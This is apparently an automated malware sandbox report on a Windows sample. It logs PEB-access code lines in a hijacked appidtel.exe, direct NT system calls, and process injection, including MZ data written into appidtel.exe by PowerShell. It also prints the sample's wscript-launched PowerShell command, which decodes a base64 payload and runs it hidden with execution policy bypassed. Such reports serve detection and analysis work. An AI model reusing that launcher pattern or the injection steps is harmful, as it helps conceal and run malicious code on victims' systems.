Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h] 5_2_0326B2C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h] 5_2_0326B2C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h] 5_2_0326B2C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324A2C3 mov eax, dword ptr fs:[00000030h] 5_2_0324A2C3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324A2C3 mov eax, dword ptr fs:[00000030h] 5_2_0324A2C3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324A2C3 mov eax, dword ptr fs:[00000030h] 5_2_0324A2C3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324A2C3 mov eax, dword ptr fs:[00000030h] 5_2_0324A2C3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324A2C3 mov eax, dword ptr fs:[00000030h] 5_2_0324A2C3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323B2D3 mov eax, dword ptr fs:[00000030h] 5_2_0323B2D3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323B2D3 mov eax, dword ptr fs:[00000030h] 5_2_0323B2D3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323B2D3 mov eax, dword ptr fs:[00000030h] 5_2_0323B2D3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326F2D0 mov eax, dword ptr fs:[00000030h] 5_2_0326F2D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326F2D0 mov eax, dword ptr fs:[00000030h] 5_2_0326F2D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03270124 mov eax, dword ptr fs:[00000030h] 5_2_03270124
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03241131 mov eax, dword ptr fs:[00000030h] 5_2_03241131
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03241131 mov eax, dword ptr fs:[00000030h] 5_2_03241131
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323B136 mov eax, dword ptr fs:[00000030h] 5_2_0323B136
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323B136 mov eax, dword ptr fs:[00000030h] 5_2_0323B136
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323B136 mov eax, dword ptr fs:[00000030h] 5_2_0323B136
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323B136 mov eax, dword ptr fs:[00000030h] 5_2_0323B136
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03300115 mov eax, dword ptr fs:[00000030h] 5_2_03300115
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032EA118 mov ecx, dword ptr fs:[00000030h] 5_2_032EA118
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032EA118 mov eax, dword ptr fs:[00000030h] 5_2_032EA118
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032EA118 mov eax, dword ptr fs:[00000030h] 5_2_032EA118
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032EA118 mov eax, dword ptr fs:[00000030h] 5_2_032EA118
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D9179 mov eax, dword ptr fs:[00000030h] 5_2_032D9179
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03315152 mov eax, dword ptr fs:[00000030h] 5_2_03315152
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D4144 mov eax, dword ptr fs:[00000030h] 5_2_032D4144
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D4144 mov eax, dword ptr fs:[00000030h] 5_2_032D4144
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D4144 mov ecx, dword ptr fs:[00000030h] 5_2_032D4144
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D4144 mov eax, dword ptr fs:[00000030h] 5_2_032D4144
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D4144 mov eax, dword ptr fs:[00000030h] 5_2_032D4144
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03239148 mov eax, dword ptr fs:[00000030h] 5_2_03239148
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03239148 mov eax, dword ptr fs:[00000030h] 5_2_03239148
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03239148 mov eax, dword ptr fs:[00000030h] 5_2_03239148
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03239148 mov eax, dword ptr fs:[00000030h] 5_2_03239148
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03246154 mov eax, dword ptr fs:[00000030h] 5_2_03246154
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03246154 mov eax, dword ptr fs:[00000030h] 5_2_03246154
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323C156 mov eax, dword ptr fs:[00000030h] 5_2_0323C156
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D8158 mov eax, dword ptr fs:[00000030h] 5_2_032D8158
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03247152 mov eax, dword ptr fs:[00000030h] 5_2_03247152
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F11A4 mov eax, dword ptr fs:[00000030h] 5_2_032F11A4
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F11A4 mov eax, dword ptr fs:[00000030h] 5_2_032F11A4
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F11A4 mov eax, dword ptr fs:[00000030h] 5_2_032F11A4
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F11A4 mov eax, dword ptr fs:[00000030h] 5_2_032F11A4
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325B1B0 mov eax, dword ptr fs:[00000030h] 5_2_0325B1B0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FC188 mov eax, dword ptr fs:[00000030h] 5_2_032FC188
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FC188 mov eax, dword ptr fs:[00000030h] 5_2_032FC188
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03280185 mov eax, dword ptr fs:[00000030h] 5_2_03280185
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C019F mov eax, dword ptr fs:[00000030h] 5_2_032C019F
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C019F mov eax, dword ptr fs:[00000030h] 5_2_032C019F
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C019F mov eax, dword ptr fs:[00000030h] 5_2_032C019F
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C019F mov eax, dword ptr fs:[00000030h] 5_2_032C019F
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323A197 mov eax, dword ptr fs:[00000030h] 5_2_0323A197
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323A197 mov eax, dword ptr fs:[00000030h] 5_2_0323A197
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323A197 mov eax, dword ptr fs:[00000030h] 5_2_0323A197
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03297190 mov eax, dword ptr fs:[00000030h] 5_2_03297190
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032451ED mov eax, dword ptr fs:[00000030h] 5_2_032451ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033161E5 mov eax, dword ptr fs:[00000030h] 5_2_033161E5
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032E71F9 mov esi, dword ptr fs:[00000030h] 5_2_032E71F9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032701F8 mov eax, dword ptr fs:[00000030h] 5_2_032701F8
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033061C3 mov eax, dword ptr fs:[00000030h] 5_2_033061C3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033061C3 mov eax, dword ptr fs:[00000030h] 5_2_033061C3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327D1D0 mov eax, dword ptr fs:[00000030h] 5_2_0327D1D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327D1D0 mov ecx, dword ptr fs:[00000030h] 5_2_0327D1D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033151CB mov eax, dword ptr fs:[00000030h] 5_2_033151CB
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BE1D0 mov eax, dword ptr fs:[00000030h] 5_2_032BE1D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BE1D0 mov eax, dword ptr fs:[00000030h] 5_2_032BE1D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BE1D0 mov ecx, dword ptr fs:[00000030h] 5_2_032BE1D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BE1D0 mov eax, dword ptr fs:[00000030h] 5_2_032BE1D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BE1D0 mov eax, dword ptr fs:[00000030h] 5_2_032BE1D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323A020 mov eax, dword ptr fs:[00000030h] 5_2_0323A020
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323C020 mov eax, dword ptr fs:[00000030h] 5_2_0323C020
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330903E mov eax, dword ptr fs:[00000030h] 5_2_0330903E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330903E mov eax, dword ptr fs:[00000030h] 5_2_0330903E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330903E mov eax, dword ptr fs:[00000030h] 5_2_0330903E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330903E mov eax, dword ptr fs:[00000030h] 5_2_0330903E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C4000 mov ecx, dword ptr fs:[00000030h] 5_2_032C4000
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325E016 mov eax, dword ptr fs:[00000030h] 5_2_0325E016
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325E016 mov eax, dword ptr fs:[00000030h] 5_2_0325E016
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325E016 mov eax, dword ptr fs:[00000030h] 5_2_0325E016
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325E016 mov eax, dword ptr fs:[00000030h] 5_2_0325E016
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C106E mov eax, dword ptr fs:[00000030h] 5_2_032C106E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03315060 mov eax, dword ptr fs:[00000030h] 5_2_03315060
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov ecx, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326C073 mov eax, dword ptr fs:[00000030h] 5_2_0326C073
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BD070 mov ecx, dword ptr fs:[00000030h] 5_2_032BD070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032E705E mov ebx, dword ptr fs:[00000030h] 5_2_032E705E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032E705E mov eax, dword ptr fs:[00000030h] 5_2_032E705E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03242050 mov eax, dword ptr fs:[00000030h] 5_2_03242050
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326B052 mov eax, dword ptr fs:[00000030h] 5_2_0326B052
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C6050 mov eax, dword ptr fs:[00000030h] 5_2_032C6050
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D80A8 mov eax, dword ptr fs:[00000030h] 5_2_032D80A8
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033060B8 mov eax, dword ptr fs:[00000030h] 5_2_033060B8
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033060B8 mov ecx, dword ptr fs:[00000030h] 5_2_033060B8
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032CD080 mov eax, dword ptr fs:[00000030h] 5_2_032CD080
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032CD080 mov eax, dword ptr fs:[00000030h] 5_2_032CD080
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324208A mov eax, dword ptr fs:[00000030h] 5_2_0324208A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323D08D mov eax, dword ptr fs:[00000030h] 5_2_0323D08D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03245096 mov eax, dword ptr fs:[00000030h] 5_2_03245096
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326D090 mov eax, dword ptr fs:[00000030h] 5_2_0326D090
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326D090 mov eax, dword ptr fs:[00000030h] 5_2_0326D090
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327909C mov eax, dword ptr fs:[00000030h] 5_2_0327909C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323A0E3 mov ecx, dword ptr fs:[00000030h] 5_2_0323A0E3

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: amsi64_1492.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 1492, type: MEMORYSTR
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtResumeThread: Direct from: 0x773836AC
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtMapViewOfSection: Direct from: 0x77382D1C
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtWriteVirtualMemory: Direct from: 0x77382E3C
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtProtectVirtualMemory: Direct from: 0x77382F9C
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtSetInformationThread: Direct from: 0x773763F9
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtCreateMutant: Direct from: 0x773835CC
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtNotifyChangeKey: Direct from: 0x77383C2C
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtSetInformationProcess: Direct from: 0x77382C5C
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtCreateUserProcess: Direct from: 0x7738371C
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtQueryInformationProcess: Direct from: 0x77382C26
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtResumeThread: Direct from: 0x77382FBC
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtWriteVirtualMemory: Direct from: 0x7738490C
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtReadFile: Direct from: 0x77382ADC
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtDelayExecution: Direct from: 0x77382DDC
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtQuerySystemInformation: Direct from: 0x77382DFC
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtOpenSection: Direct from: 0x77382E0C
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtQuerySystemInformation: Direct from: 0x773848CC
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtReadVirtualMemory: Direct from: 0x77382E8C
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtCreateKey: Direct from: 0x77382C6C
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtAllocateVirtualMemory: Direct from: 0x773848EC
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtQueryAttributesFile: Direct from: 0x77382E6C
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtSetInformationThread: Direct from: 0x77382B4C
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtTerminateThread: Direct from: 0x77382FCC
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtQueryInformationToken: Direct from: 0x77382CAC
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtOpenKeyEx: Direct from: 0x77382B9C
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtDeviceIoControlFile: Direct from: 0x77382AEC
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtCreateFile: Direct from: 0x77382FEC
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtOpenFile: Direct from: 0x77382DCC
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtClose: Direct from: 0x77377B2E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\appidtel.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\appidtel.exe Section loaded: NULL target: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe protection: execute and read and write
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Section loaded: NULL target: C:\Windows\SysWOW64\appidtel.exe protection: execute and read and write
